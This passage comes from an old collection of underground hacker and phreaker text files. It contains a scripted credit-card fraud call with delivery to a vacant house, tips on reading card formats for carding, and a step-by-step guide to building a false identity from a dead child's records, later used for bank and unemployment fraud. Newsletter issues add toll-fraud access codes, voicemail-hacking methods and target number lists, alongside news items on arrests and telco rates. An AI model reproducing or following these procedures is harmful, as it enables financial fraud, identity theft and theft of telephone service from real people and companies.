Visa-PV instead of CV.
Note-When verifying a PV Visa, you have to have the real name of the cardholder.
Mastercard-An asterisk can signify a gold card, but this changes depending when
the card was issued. I am going to type out a dialog between a carder and the
phone operator to help you get the idea.
Operator: "Over-priced Computer Goods, may I help you?"
Carder: "Hi, I would like to place an order please."
Operator: "Sure, what would you like to order?"
Carder: "400 generic disks and a double density drive."
Operator: "Ok, is there anything else?"
Carder: "No thank you, that's all for today."
Operator: "Ok, how would you like to pay for this? MasterCard or Visa?"
Carder: "Visa."
Operator: "And your name is?"
Carder: "Lenny Lipshitz." (Name on card)
Operator: "And your Visa card number is?"
Carder: "4240-419-001-340" (Invalid card)
Operator: "Expiration date?"
Carder: "06-92."
Operator: "And where would you like the package shipped to?"
Carder: "6732 Goatsgate Port. Paris, Texas, 010166."
Operator: "And what is your home telephone number?"
Carder: "212-724-9970" (This number is actually always busy)
Operator: "I will also need your business phone number in case we have to reach
you."
Carder: "You can reach me at the same number. 212-724-9970"
Operator: "O.K. Thank you very much and have nice day."
Carder: "Excuse me, when will the package arrive?"
Operator: "In six to seven days UPS."
Carder: "Thanks a lot, and have a pleasant day."
Now you wait 6-7 days when the package will arrive to the address which is
really a house up for sale. There will be a note on the door saying, "Hello UPS,
please leave all packages for Lenny
Lipshitz in the lobby or porch. Thanks a lot, Lenny Lipshitz" (Make the
signature half-way convincing)
87. Recognizing credit cards by The Jolly Roger
[Sample: American Express]
XXXX XXXXXX XXXXX
MM/Y1 THRU MM/Y2 Y1
John Doe AX
Explanation:
The first date is the date the person got the card, the second date is the
expiration date, after the expiration date is the same digits in the first year.
The American Express Gold has many more numbers
(I think 6 8 then 8). If you do find a Gold card keep it for it has a $5000.00
backup even when the guy has no money!
[Sample: Master Card]
5XXX XXXX XXXX XXXX
XXXX AAA DD-MM-YY MM/YY
John Doe.
Explanation:
The format varies, I have never seen a card that did not start with a 5XXX there
is another 4 digits on the next line that is sometimes asked for when ordering
stuff, (and rarely a 3 digit letter combo (e.
ANB). The first date is the date the person got the card and the second date is
the expiration date. Master Card is almost always accepted at stores.
[Sample: VISA]
XXXX XXX(X) XXX(X) XXX(X)
MM/YY MM/YY*VISA
John Doe
Explanation:
Visa is the most straight forward of the cards, for it has the name right on the
card itself, again the first date is the date he got the card and the second is
the expiration date. (Sometimes the first date is
left out). The numbers can either be 4 3 3 3 or 4 4 4 4. Visa is also almost
always accepted at stores, therefore, the best of cards to use.
88. How To Create A New Identity by The Walking Glitch
You might be saying, "Hey Glitch, what do I need a new identity for?" The answer
is simple. You might want to go buy liquor somewhere, right? You might want to
go give the cops the false name
when you get busted so you keep your good name, eh? You might even want to use
the new identity for getting a P.O. Box for carding. Sure! You might even want
the stuff for renting yourself a VCR
at some dickless loser of a convenience store. Here we go: Getting a new ID
isn't always easy, no one said it would be. By following these steps, any bozo
can become a new bozo in a couple of
weeks.
STEP 1
The first step is to find out who exactly you'll become. The most secure way is
to use someone's ID who doesn't use it themselves. The people who fit that bill
the best are dead. As an added bonus
they don't go complaining one bit. Go to the library and look through old death
notices. You have to find someone who was born about the same time as you were,
or better yet, a year or two older so
you can buy booze, etc. You should go back as far as you can for the death
because most states now cross index deaths to births so people can't do this in
the future. The cutoff date in Wisconsin is
1979, folks in this grand state gotta look in 1978 or earlier. Anything earlier
there is cool. Now, this is the hardest part if you're younger. Brats that young
happen to be quite resilient, taking falls out of
three story windows and eating rat poison like its Easter candy, and not a
scratch or dent. There ain't many that die, so ya gotta look your ass off. Go
down to the library and look up all the death
notices you can, if it's on microfilm so much the better. You might have to go
through months of death notices though, but the results are well worth it. You
gotta get someone who died locally in most
instances: the death certificate is filed only in the county of death. Now you
go down to the county courthouse in the county where he died and get the death
certificate, this will cost you around $3-$5
depending on the state you're in. Look at this hunk of paper, it could be your
way to vanish in a cloud of smoke when the right time comes, like right after
that big scam. If You're lucky, the slobs
parents signed him up with social security when he was a snot nosed brat.
That'll be another piece of ID you can get. If not, that's Ok too. It'll be
listed on the death certificate if he has one. If you're
lucky, the stiff was born locally and you can get his birth certificate right
away.
STEP 2
Now check the place of birth on the death certificate, if it's in the same place
you standing now you're all set. If not, you can mail away for one from that
county but its a minor pain and it might take a
while to get, the librarian at the desk has listings of where to write for this
stuff and exactly how much it costs. Get the Birth certificate, its worth the
extra money to get it certified because that's the only
way some people will accept it for ID. When you're getting this stuff the little
forms ask for the reason you want it, instead of writing in "Fuck you", try
putting in the word "Genealogy". They get this all
the time. If the Death certificate looks good for you, wait a day or so before
getting the certified birth certificate in case they recognize someone wanting
it for a dead guy.
STEP 3
Now your cooking! You got your start and the next part's easy. Crank out your
old Dot matrix printer and run off some mailing labels addressed to you at some
phony address. Take the time to check
your phony address that there is such a place. Hotels that rent by the month or
large apartment buildings are good, be sure to get the right zip code for the
area. These are things that the cops might
notice that will trip you up. Grab some old junk mail and paste your new labels
on them. Now take them along with the birth certificate down to the library.
Get a new library card. If they ask you if you had one before say that you
really aren't sure because your family moved around a lot when you were a kid.
Most libraries will allow you to use letters as a
form of ID when you get your card. If they want more give them a sob story about
how you were mugged and got your wallet stolen with all your identification.
Your card should be waiting for you in
about two weeks. Most libraries ask for two forms of ID, one can be your trusty
Birth Certificate, and they do allow letters addressed to you as a second
form.
STEP 4
Now you got a start, it isn't perfect yet, so let's continue. You should have
two forms of ID now. Throw away the old letters, or better yet stuff them inside
the wallet you intend to use with this stuff. Go
to the county courthouse and show them what nice ID you got and get a state ID
card. Now you got a picture ID. This will take about two weeks and cost about
$5, its well worth it.
STEP 5
If the death certificate had a social security number on it you can go out and
buy one of those metal SS# cards that they sell. If it didn't, then you got all
kinds of pretty ID that shows exactly who you
are. If you don't yet have an SS#, Go down and apply for one, these are free but
they could take five or six weeks to get, Bureaucrats you know... You can invent
a SS# too if you like, but the motto
of 'THE WALKING GLITCH' has always been "Why not excellence?".
STEP 6
If you want to go whole hog you can now get a bank account in your new name. If
you plan to do a lot of traveling then you can put a lot of money in the account
and then say you lost the account
book. After you get the new book you take out all the cash. They'll hit you with
a slight charge and maybe tie-up your money some, but if you're ever broke in
some small town that bank book will
keep you from being thrown in jail as a vagrant.
ALL DONE?
So kiddies, you got ID for buying booze, but what else? In some towns (the
larger the more likely) the cops if they catch you for something petty like
shoplifting stuff under a certain dollar amount, will
just give you a ticket, same thing for pissing in the street. That's it! No
fingerprints or nothing, just pay the fine (almost always over $100) or appear
in court. Of course they run a radio check on your
ID, you'll be clean and your alter-ego gets a blot on his record. Your free and
clear. That's worth the price of the trouble you've gone through right there. If
your smart, you'll toss that ID away if this
happens, or better yet, tear off your picture and give the ID to someone you
don't like, maybe they'll get busted with it. If you're a working stiff, here's
a way to stretch your dollar. Go to work for as
long as it takes to get unemployment and then get yourself fired. Go to work
under the other name while your getting the unemployment. With a couple of sets
of ID, you can live like a king. These
concepts for survival in the new age come to you compliments of THE WALKING
GLITCH.
89. Remote Informer Issue #2 by Tracker, Norman Bates, and Ye Cap'n
Raggers and Braggers
This section is to make you aware of well-known raggers and braggers. Since this
is the first time this section is being printed, we will tell you what
classifies people as raggers and braggers. In the
future issues the top raggers and braggers will be listed in this newsletter to
let the SysOps know who not to let on their board, or to atleast keep an eye on.
A ragger is someone who will put
someone else down for something. The person might post a message asking a novice
question about hacking and phreaking, or may say something that is completely
wrong, and a ragger will put
the other person down for he said, posted, etc. The ones that usually classify
in this category are the ones that think they know it all and consider
themselves right no matter what anyone says. Most
of the users that use codes and consider themselves a master phreaker usually
become raggers.
A bragger is someone who either does or thinks he does know everything, and puts
it upon himself to tell the whole world that he knows it all. This person is
also one who thinks he is better than
everyone else and he believes he is Elite, and no one else is. People who tend
to do this are those who have, for some reason, become well-known in the
underworld, and as a result become a
bragger. Those usually not too well-known will not tend to brag as much as those
who think everyone would love to be their friend and be like them.
As a well-known ragger and bragger, The Toad, learned that it does not help to
be one or both of those. He has since changed and is now easily accepted by
most. Most people disliked him
because others they knew had said something bad about him. This is called peer
pressure and is a bad influence to those who are new to the underworld. I would
suggest in the future, to not judge
someone by what others say, but rather by how they act around/to you. The
current most popular Atarian that classifies as a ragger and a bragger is Ace of
Aces, and is well-hated by many users and
SysOps, since he tends to put down anything anyone says and considers himself
the best at writing hacking programs. He is commonly referred to as Ass of Asses
and Ass of Assholes. Even holding an
open mind about this guy, you would soon come to find that what others said
coincides with what you see from him.
A New 950 has arrived!
LDDS, who as mentioned above bought out TMC, is installing a new 950 port to
most major cities. By the time you read this, it should be in almost every area
that supports 950 ports. The
number is 950-1450. This port will dial 976 numbers, but not 700, 800, or 900
numbers. The dialing method for LDDS is: 7 digit code, then even if the code is
bad it will give you a dial tone.
Then dial the area code plus the number. If you have a bad code it will simply
say your call cannot be completed as it was dialed. There is a default code used
on the system that currently works.
The code is simply, 1234567. I have seen codes from 5 different companies and
they all are in the format of 00xxxxx. I do not know what type of software they
use, but I will know by the next
issue exactly what they place on the bills. This could be the answer to a lot of
people's problems with fear of Sprint and ITT, especially AllNets. Just
remember, Tracker is the one who found
this, and all information about it. If someone is seen saying they found this,
then they will be listed in the next issue which will contain an article on
leeches.
Mailbox Systems
Mailbox systems are the link between information and the underworld. If you have
ever called one, then you will know the advantages of having one, especially the
ones that are open to whole
underworld, rather than just a select few. There are two types of mailbox
systems that are widely used. The first type we will talk about is the multiple
mailbox systems, or commonly referred to as
message systems. These systems have several mailboxes set up on one number.
Usually, you can access other mailboxes from that number by pressing '*' or '#'.
Sometimes you just enter the
mailbox number and you are connected. These are the safest systems to use to
protect information from US Sprint and other long distance companies. Since US
Sprint and other companies call the
destination numbers, it is safer to have 800 mailbox systems, and most of the
time, the multiple mailbox systems are on 800 numbers. The passcode on these
systems can vary in length and can
be accessed by several different methods, so it is impossible to explain exactly
how to hack these systems.
The other type is the single mailbox system. These are usually set up in a
reserved prefix in an area code. (Ex: 713-684-6xxx) These systems are usually
controlled by the same type of
hardware/software. To access the area where you enter the passcode, just hit '0'
for a second or so. The passcodes are four (4) digits long. The only way to hack
these is manually. The best
thing you could do is to find one that does not have a recording from a person,
but just the digitized voice. If you hack one that someone already owns, they
will report it and it will not last as long.
Here is a list mailboxes or prefixes to help you get started
--------------------------------------------------------------------------
Single Multiple Name Digits
213-281-8xxx 212-714-2770 3
213-285-8xxx 216-586-5000 4
213-515-2xxx 415-338-7000 Aspen Message System 3
214-733-5xxx 714-474-2033 Western Digital
214-855-6xxx 800-222-0651 Vincent and Elkins 4
214-978-2xxx 800-233-8488 3
215-949-2xxx 800-447-8477 Fairylink 7
312-450-8xxx 800-521-5344 3
313-768-1xxx 800-524-2133 RCA 4
405-557-8xxx 800-527-0027 TTE TeleMessager 6
602-230-4xxx 800-632-7777 Asynk 6
619-492-8xxx 800-645-7778 SoftCell Computers 4
713-684-6xxx 800-648-9675 Zoykon 4
800-847-0003 Communications World 3
90. Remote Informer Issue #3 by Tracker, Ye Cap'n, Norman Bates
Introduction
It's been a month now, and A LOT has happened. So much, in fact, that the
information will be split into several issues. This should be no shock since I
mentioned in the first issue that we may put
several issues out sometimes. I want to congratulate the readers for finally
contributing to the newsletter. This first two issues were all on information
that I, myself, obtained. Several people gave me
information for these issues, and their handle and information is included in
the articles.
ITT has 9 digits!
For those of you who did not know this, ITT has nine digit codes. They are said
to give better connections to some extent. This info was originally given to us
by Party Beast.
Phreaky Phones Go Down!
The famed Phreaky Phones are down again. Modem Man, the original person that
started them, has said that they will be down until further notice. In the
meantime, other independent boxes are being
started. A listing can be made of current ones on request.
Magnus Adept Gets Busted
Fellow Atarian and well-known phreak Magnus Adept got caught by MCI. Details of
the how, when, and where are not known at this time. He got caught with 150
codes and may have to pay up to
50 dollars for each code.
Sprint Codes Are Dying Fast!
Sprint codes are hard to get and when they are obtained, they tend to die rather
quickly. Phreakers have been saying that the 950-0777 port is dead, but on the
contrary, it is still available in states
that are not highly abused by phreaks. Here again, rumors are being spread.
The Best BBS of the Month
Starting from now on, we will have a BBS of the month. We will choose a BBS,
regardless of computer type, and look at the user participation in phreak
related matters, as well as quality discussions
on the various illegal topics. A BBS can remain the BBS of the month as long as
they reside above the rest of the BBS systems. Even though we will sometimes
bring out more than one issue in a
month, the board will remain BBS of the month until the first issue in the next
month comes out.
This month's BBS of the month is FBI PirateNet. We chose this board because of
the large numbers of posts in the bases, and not only information, but
discussions as well, with a minimum number of
posts from raggers and braggers. The number for it is 516-661-7360. The Sysop of
FBI PirateNet is The Phantom, not to be confused with an earlier NARC.
US Sprint Expected to Trim Staff, Consolidate Divisions
New York -- US Sprint Communications Corp., the troubled long distance carrier,
is expected to announce soon that it will cut its work force by several hundred
people and reduce its seven regional
divisions to 3 operating groups, sources familiar with the company said.
The company's Pacific division is based in Burlingame, CA. The layoffs and
reorganization are part of a plan by US Sprint's new president, Robert H.
Snedaker, to reduce heavy operating losses,
which analysts expect to reach more than $800 million this year.
Snedaker replaced Charles M. Slibo, who was forced to resign in July because
losses were running much higher than the parent companies had expected. Problems
with the company's computerized
billing system also contributed to Skibo's ouster. US Sprint is owned and
operated by the GTE Corp. and United TeleCom.
According to sources close to Snedaker, who was vice chairman and chief
operating officer of United TeleCom, he is planning to consolidate the company's
7 divisions, which operate in the same
geographical regions as the seven regional Bell operating companies, into 3
divisions.
The rationale for the move, according to industry analysts, is that the company
will need a much smaller work force once it begins handling all it's phone
traffic on it's new fiber optic network, which can
carry a greater number of telephone calls at less cost. Company officials have
said that they expect to have most of the traffic on the network by early next
year. One source said that there would be
more than one round of layoffs in the coming months and that the company
ultimately plans to reduce its 14,000 member work force by 15 percent.
Several top managers are expected to resign as soon as US Sprint centralizes its
marketing and support operations as its headquarters in Kansas City, MO.,
according to a report in the latest issue of
Business Week magazine.
A spokesman for US Sprint said on Friday that the company would not comment on
the rumors. The company is the nation's third largest long distance company,
after the American Telephone and
Telegraph Co. (AT&T) and MCI Communications Co.
Last year, Washington based MCI undertook a similar reorganization in which it
posted a $502½ million loss to write down old inventory and restructure
operations.
Analysts said that is US Sprint is to turn a profit, the company must increase
its market share. "To do this, US Sprint must gain more large business
customers, which account for about 80 percent of
industry revenues," said Robert B. Morris III, Securities in San Francisco.
Morris said that by using a slick marketing campaign to differentiate its
all-fiber telephone network from those of competitors, US Sprint more than
doubled its customer base last year. But "most of
these customers were residential and small business users that added little to
Sprint's bottom line," he added. "If the company expects to be profitable, it
will have to concentrate on providing the best
service to volume users."
Secret Service Cracks Down on Teen Hackers
Mount Lebanon, PA -- The US Secret Service and local police departments have put
a scare into the hacker community with a nationwide crackdown on computer crime
that has resulted in the arrests
of teenage hackers in at least three cities.
"People who monitor the bulletin boards say there are a lot of nervous hackers
out there, wondering who will be arrested next," says Ronald E. Freedman,
vice-president of Advanced Information
Management, a Woodbridge, VA base computer security firm.
Nine teenagers from Mount Lebanon Junior-Senior High School near Pittsburg, PA,
were arrested recently and charged with computer fraud. The juveniles allegedly
used home computers to gain
illegal access to a credit card authorization center. They obtained valid credit
card numbers and used them to purchase thousands of dollars worth of mail order
merchandise, the police said.
Freedman says it appears the hackers used some relatively sophisticated
techniques in the scheme, including specially written software that enabled them
to bypass security controls and navigate
through credit records to obtain key information.
Police officials say that the hackers also obtained access codes from pirate
bulletin board systems to make free long distance calls and gain access to
various business and government computers.
The arrests were the result of a 6 week investigation by the Secret Service and
the Mount Lebanon police. The police were tipped off by parents who were
suspicious about how their son managed to
obtain a skateboard valued at $140.
The Secret Service was also involved in investigations that led to the arrests
of several hackers in San Francisco and New York last July.
Secret Service spokesman William Corbett says that although some reports have
portrayed the hackers as part of a national crime ring, the cases are unrelated.
"It's just that a few of these computers
hacking cases came to a head at about the same time," he says.
Federal Legislation enacted in 1984 gives the Secret Service, part of the
Department of the Treasury, a major role in investigating computer crimes. Under
the federal Computer Fraud and Abuse Act
of 1986, computer fraud is a felony that carries a maximum penalty of 5 years
for the first offense, and 10 years for the second. Displaying unauthorized
passwords on hacking bulletin boards carries a
maximum penalty of 1 year in prison for the first offense, and 10 years for the
second.
German Teens Crack NASA
Washington, D.C. -- A group of West German teenagers from the Chaos Computer
Club penetrated a NASA network recently, saying they were doing it to "test the
security."
What they got into was SPAN Net, a computer network with about 700 notes, which
is actually based at the Goddard Space Center in Maryland. All that's in there
is unclassified data, space science
information, and post-flight data analysis. "Anyone with NASA related research
can apply for access to SPAN" says a spokesman, who adds that the network runs
on DEC VAX hardware. "We
picked up three attempts to gain access and put in security precautions so it
wouldn't happen." His personal opinion is, "We're happy that they couldn't get
back in, and decided to go public." He also
added that NASA has many other networks, many of the classified and "probably
impenetrable. But I do not want to challenge anybody."
How'd they get in? Probably they got a West German NASA licensee, which gave
them a visitor's pass, then they created new passwords with unlimited security
for themselves, after which getting
around the network was easy.
91. Remote Informer Issue #4 by Tracker, Norman Bates, Ye Cap'n
Switching Systems
There are currently three different forms of switching systems that are present
in the United States today. Step by Step (SxS), Crossbar, and the Electronic
Switching System (ESS) make up the group.
Phreaks have always been a little tentative when it comes to "doing their work"
once they have heard about effects of switching systems on their hobby. After
researching this topic, I have found that
there really is not that much to be worried about. Read on, while I share with
you information which I have compiled about all of these switching systems and
their distinct features.
The first switching system that was used in the country was called Step by Step.
This was adopted in 1918 by Bell, and until 1978, they had over 53% of all their
exchanges using Step by Step (SxS).
This system is known for it's long, confusing train of switches that are used
for its step by step switching.
Step by Step has many disadvantages to phone users. The switch train becomes
jammed fairly often, and it causes calls to be blocked. Also, SxS does not allow
the use of DTMF dialing. This
accounts for some of the areas in the United States that cannot have touch tone
dialing abilities. A tremendous amount of electricity and maintenance needs to
accompany the SxS switching system,
which makes it even more impratical. All in all, this is probably the most
archaic switching system around.
There are a number of ways to see if you are on SxS. You will notice that there
are no pulsing digits after dialing. Most sources say that the phone company
will sound like many typewriters. SxS does
not offer features such as speed calling, call forwarding, three-way calling,
call waiting, and other such services. Pay phones on SxS also will want your
money before you receive a dial tone. This adds
to the list of disadvantages labeled to that of the Step by Step switching
systems.
Another type of switching system that is prevalent in the United States is
Crossbar. Crossbar has been Bell's primary switcher after 1960, and three types
of it exists. Number 1 Crossbar (1xB),
Number 4 Crossbar (4xB), and the Number 5 Crossbar (5xB). In Crossbar, a
switching matrix is used for all the phones in an area, and when someone calls,
the route is determined and is met up with
the other phone. This matrix is set-up in horizontal and vertical paths. Unlike
other switching systems, in my research, I could not come up with any true and
definite distinguishing features of the
Crossbar switching systems.
The Electronic Switching System (ESS) is yet another switching system used in
the United States and the most used of all three switching systems. ESS is an
extremely advanced and multi-faced type of
switching system, and is feared by marauders of the phone company everywhere.
With ESS, your phone company is able to know every digit dialed (including
mistakes), who you call, when you
called, and how long you were connected. ESS is also programmed to print out the
numbers of people who make excessive calls to WATS numbers (800 services) or
directory assistance. This
feature of ESS is called 800 Exceptional Calling Report, and has spelled the end
of some forms of continuous code hacks to certain extenders. ESS can also be
programmed to print logs of who called
and abused certain numbers as well. Everything is kept track of in its records.
The aforementioned facts show that ESS has made the jobs of organizations such
as the FBI, NSA, and other phone company security forces easier. Tracing can be
done in a matter of microseconds,
and the result will be conveniently printed out on the monitor of a phone
company officer. ESS is also programmed to pick up any "foreign tones" on the
phone line such as the many varied tones
emulated by boxes.
ESS can be identified by a few features common in it. The 911 emergency service
is covered in the later versions of ESS. Also, you are given the dial tone first
when using a pay phone unlike that of
SxS. Calling services like call forwarding, speed calling, and call waiting are
also common to ESS. One other feature common to ESS is ANI (Automatic Number
Identification) for long distance calls.
As you can see, ESS is basically the zenith of all switching systems, and it
will probably plague the entire country by the early 1990's. Soon after, we
should be looking forward to a system called
CLASS. This switching system will contain the feature of having the number of
the person that is calling you printed out on your phone.
What have I concluded about these switching systems? Well, they are not good
enough. I know a few people employed by the phone company, and I know for a fact
that they do not have enough
time these days to worry about code users, especially in large, metropolitan
areas. So, I will go out on a limb here, and say that a large portion of people
will never have to worry about the horrors of
ESS.
New Gizmo Can Change Voice Gender
The most amazing device has turned up in the new Hammacher Schlemmer catalog:
the telephone voice gender changer. What it does is change the pitch of your
voice from, say, soprano to bass -- a
most efficient way to dissuade an obscene phone caller just as he's getting
warmed up. That is not the same as running a 45 rpm. record at 33. In digital
conversion, the pitch can be changed without
altering the speed.
The device runs on a 9-volt batter and attaches to the telephone mouth piece
with a rubber coupler that takes but a moment to slip on and off. With the
changer switched on, says Lloyd Gray, a
Hammacher Schlemmer technical expert, "the effect is similar to what you hear
when they interview an anonymous woman on television and disguise her voice by
deepening it." "It's better for changing a
woman's voice to a man's than the other way around," Gray said. A man can use it
to raise the pitch of his voice, but he still won't sound like a woman."
A man could, however, use the changer to disguise his voice. But with the device
set on high, Gray's voice still could be identified as his own. On low, his
normal tenor became so gravel like that the
words were unintelligible.
92. Remote Informer Issue #5 by Tracker, Norman Bates, and Ye Cap'n
AT&T Rates
WASHINGTON -- American Telephone & Telegraph Co. proposed Tuesday to lower its
interstate long-distance rates by an average of 3.6% to reflect reduced costs in
connecting to the local
telephone network. The largest decrease -- 6.3% -- would be seen in day time
prices "Because of the need to make those rates more competitive," AT&T said.
Rates for calls made during evening hours would drop 2.2% and calls made during
the late night and weekends would be cut by 0.8%, the company said. The rate
reductions would take effect Jan. 1, if
they are approved by the Federal Communications Commission. Reacting to the
proposed price cuts, MCI Communications Corp. and US Sprint Communications Co.,
the nation's second-largest and
third-largest long distance companies respectively, said their response would
depend on what the FCC finally approves but both said they intended to remain
competitive with AT&T. AT&T, the
nation's largest long-distance company, proposed to the FCC that its rates drop
as much as $800 million, but AT&T said the exact amount will depend on the
access charges the FCC allows the local
telephone companies to collect from long distance carriers, which must pay the
fees to hook into the phone local network.
AT&T has challenged the new access rates filed by the regional Bell operating
companies, contending they are more than $1 billion too high. In proposing its
new rates, the long-distance leader told the
FCC it expects local companies' access fees to fall by at least $200 million --
which would amount to an average rate reduction of less than 1%. But the company
said it believes the FCC will order an
additional $600 million in reductions based on AT&T's challenge.
"We're confident the FCC will recognize that access charges filed by the local
telephone companies need to be substantially reduced, which would mean more
savings for our customers," said Larry
Garfinkel, AT&T vice president for marketing. He said the company filed its
proposed rates based on disputed charges because "we wanted to let the public
react ... and further to let the FCC have full
knowledge of where we were heading given our expectation that we had a valid
basis for our dispute."
AT&T's long-distance rates have fallen by about 34% since the company was
stripped of its local operating companies by an antitrust decree nearly four
years ago. Since then, phone rate payers have
been paying a larger share of the
costs of maintaining the local network through monthly subscriber line charges,
now $2.60 for residential customers. That has reduced the long-distance
companies' share of local network expenses, which they pay in the form of access
charges. Jack Grubman, a telephone analyst
with PaineWebber Inc., said AT&T's proposal targets business customers because
"that's where the competition is and where the better (profit) margins are." In
addition, it aims to keep the pressure
on competition in international calling by extending discounts to more
customers. Grubman added that, if the company's rate proposal is approved by the
FCC, he would expect no further cuts in
AT&T rates in 1988. Wendell Lind, AT&T administrator of rates and tariffs, said
the cuts for business and residential customers are about the same because
business cuts are offset by a proposed
$128 million increase in AT&T's private line rates.
AT&T is the only long-distance company whose rates are regulated by the FCC, but
its prices set the pace for the industry. Though AT&T is far larger than any of
its competitors, its market share has
been declining since divestiture and the company now says it serves about 75
percent of the market. In addition to the reductions in basic long-distance
rates, AT&T proposed cutting prices by 5% and
5.7% for its Pro-America calling plans. The company also proposed to reduce
prices by 2.9 percent for its 800 Service customers and 4.4 percent for WATS
customers, although it would increase the
monthly access line charges for those plans by $3.20 to reflect higher special
access charges filed by the local phone companies.
US Sprint Operator Service Traffic Increases 40%
ORLANDO, Fla. -- US Sprint Wednesday announced its long distance operators who
began saying, "May I help you?" just five months ago, are now handling 3½
million calls a month.
The fiber-optic long-distance carrier, offering the only operator service
alternative to AT&T has experienced a 40 percent growth in operator service
calls since it announced its service July 1. Amanda
Weathersby, US Sprint vice president of product marketing, said Tuesday, "More
and more people are taking advantage of our call completion assistance and
alternative billing arrangements.
"Customer surcharges are the same as AT&T with the added benefit of US Sprint's
fiber-optic quality and lower long-distance rates." US Sprint currently offers
person-to-person, station-to-station,
call completion and collect calling. US Sprint has announced an agreement with
US WEST Service Link that will allow anyone to call on US Sprint and charge
their calls to a Regional Bell Operating
Co. calling card beginning in first quarter 1988.
"Previously, our operator service was available only on pre-subscribed US Sprint
phones and recently we added operator assistance for US Sprint FON CARD
customers," Weathersby said. "With
this new agreement, we'll be able to expand our operator service to markets such
as pay phones, hospitals, and hotels/motels." The newest 24-hour operator
service center in Dallas began operations
on Oct. 5. US Sprint's other operator service centers are in: Cherry Hill, NJ;
Atlanta; Lombard, IL and Reno, NV. US Sprint is a joint venture of United
Telecommunications Inc. of Kansas City, MO
and GTE Corp. of Stamford, Conn.
Pacific Bell Pursuing Calling Card Thief
SAN FRANCISCO--(BW)--Pacific Bell is warning consumers to protect their
telephone calling cards like any other credit card in the wake of a series of
frauds by people posing as phone company
employees. A Pacific Bell spokesman says customers in the 213, 805 and 916 area
codes are being victimized by someone who says he is a telephone company
employee investigating calling card
fraud. The individual calls people at home at odd hours, asking for their
calling card numbers. He then sells the numbers to people who use the numbers to
make long distance phone calls.
As recently as Monday of this week, 180 long distance calls were billed to a
Sacramento area resident who had given his number to the thief just three hours
earlier. According to Pacific Bell, this kind
of scheme and other forms of calling card fraud cost telephone customers
nationwide half a billion dollars a year. The company offered these tips to
consumers to avoid becoming a victim
of calling card fraud:
Never give your calling card number or personal identification number to anyone.
Any telephone company employee with a legitimate need to know the number has
access to it. Treat your calling card
like any other credit card. Report its loss immediately by calling the 800
number on the back of the card 800-621-0430. If you receive a suspicious call
regarding your telephone calling card, report
it by calling the 800 number on the back of the card. If you receive a call from
someone claiming to be a telephone company employee and asking for your calling
card number, ask for a name and
number to call back. Then call the local Pacific Bell business office to report
the incident.
One suspect was arrested in Southern California last week by a quick thinking
customer who did just that. Pacific Bell immediately contacted the local police
department. A suspect holding seven stolen
calling card numbers was arrested minutes later. Pacific Bell and long-distance
telephone companies will credit customers for calling card charges determined to
be fraudulent. Pacific Bell is a subsidiary
of Pacific Telesis Group, a diversified telecommunications corporation based in
San Francisco.
93. The Phreaker's Guide to Loop Lines by The Jolly Roger
A loop is a wondrous device which the telephone company created as test numbers
for telephone repairmen when testing equipment. By matching the tone of the
equipment with the tone of the loop,
repairmen can adjust and test the settings of their telephone equipment. A loop,
basically, consists of two different telephone numbers. Let's use A and B as an
example. Normally if you call A, you will
hear a loud tone (this is a 1004 hz tone), and if you call B, the line will
connect, and will be followed by silence.
This is the format of a loop line. Now, if somebody calls A and someone else
calls B--Viola!--A and B loop together, and one connection is made. Ma Bell did
this so repairmen can communicate with
each other without having to call their own repair office. They can also use
them to exchange programs, like for ANA or Ringback. Also, many CO's have a
"Loop Assignment Center". If anyone has
any information on these centers please tell me. Anyway, that is how a loop is
constructed. From this information, anyone can find an actual loop line. Going
back to the A and B example, Note: the
tone side and the silent side can be either A or B. Don't be fooled if the phone
company decides to scramble them around to be cute. As you now know, loops come
in pairs of numbers. Usually, right
after each other.
For example: 817-972-1890
and
817-972-1891
Or, to save space, one loop line can be written as 817-972-1890/1. This is not
always true. Sometimes, the pattern is in the tens or hundreds, and,
occasionally, the numbers are random. In cities,
usually the phone company has set aside a phone number suffix that loops will be
used for. Many different prefixes will correspond with that one suffix. In
Arlington, Texas, a popular suffix for loops is
1893 and 1894, and a lot of prefixes match with them to make the number.
For Example: 817-460-1893/4
817-461-1893/4
817-465-1893/4
817-467-1893/4
817-469-1893/4
...are all loops...
or a shorter way to write this is:
817-xxx-1893/4
xxx= 460, 461, 465, 467, 469
Note: You can mix-and-match a popular suffix with other prefixes in a city, and
almost always find other loops or test numbers.
Note: For Houston, the loop suffixes are 1499 and 1799. And for Detroit it's
9996 and 9997. When there are a large number of loops with the same prefix
format, chances are that many loops will be
inter-locked. Using the above example of Arlington loops again, (I will write
the prefixes to save space) 460,
461, and 469 are interlocked loops. This means that only one side can be used at
a given time. This is because they are all on the same circuit. To clarify, if
817-461-1893 is called, 817-460 and 469-1893 cannot be called because that
circuit is being used. Essentially, interlocked
loops are all the same line, but there are a variety of telephone numbers to
access the line.
Also, if the operator is asked to break in on a busy loop line he/she will say
that the circuit is overloaded, or something along those lines. This is because
Ma Bell has taken the checking equipment off
the line. However, there are still many rarely used loops which can be verified
and can have emergency calls taken on them. As you have found out, loops come in
many types. Another type of loop is
a filtered loop. These are loop lines that the tel co has put a filter on, so
that normal human voices cannot be heard on either line. However, other
frequencies may be heard. It all depends on what the
tel co wants the loop to be used for. If a loop has gotten to be very popular
with the local population or used frequently for conferences, etc. the tel co
may filter the loop to stop the unwanted "traffic".
Usually, the filter will be removed after a few months, though.
94. How Ma Bell Works by The Jolly Roger
In this article, I will first describe the termination, wiring, and terminal
hardware most commonly used in the Bell system, and I will include section on
methods of using them.
LOCAL NETWORK
The local telephone network between the central office/exchange and the
telephone subscribers can be briefly described as follows:
From the central office (or local exchange) of a certain prefix(es), underground
area trunks go to each area that has that prefix (Usually more than one prefix
per area.) At every few streets or tract
areas, the underground cables surface. They then go to the telephone pole (or
back underground, depending on the area) and then to the subscribers house (or
in the case of an apartment building or
mutli-line business, to a splitter or distribution box/panel). Now that we have
the basics, I'll try and go in-depth on the subject.
UNDERGROUND CABLES
These are sometimes inter-office trunks, but usually in a residential area they
are trunk lines that go to bridging heads or distribution cases. The cables are
about 2-3 inches thick (varies), and are either
in a metal or pvc-type pipe (or
similar). Rarely (maybe not in some remote rural areas) are the cables just
'alone' in the ground. Instead they are usually in an underground cement tunnel
(resembles a small sewer or storm drain.) The
manholes are heavy and will say 'Bell system' on them. They can be opened with a
½ inch wide crowbar (Hookside) inserted in the top rectangular hole. There are
ladder rungs to help you climb down.
You will see the cable pipes on the wall, with the blue and white striped one
being the inter-office trunk (at least in my area). The others are local lines,
and are usually marked or color coded. There is
almost always a posted color code chart on the wall, not to mention Telco
manuals describing the cables and terminals, so I need not get into detail.
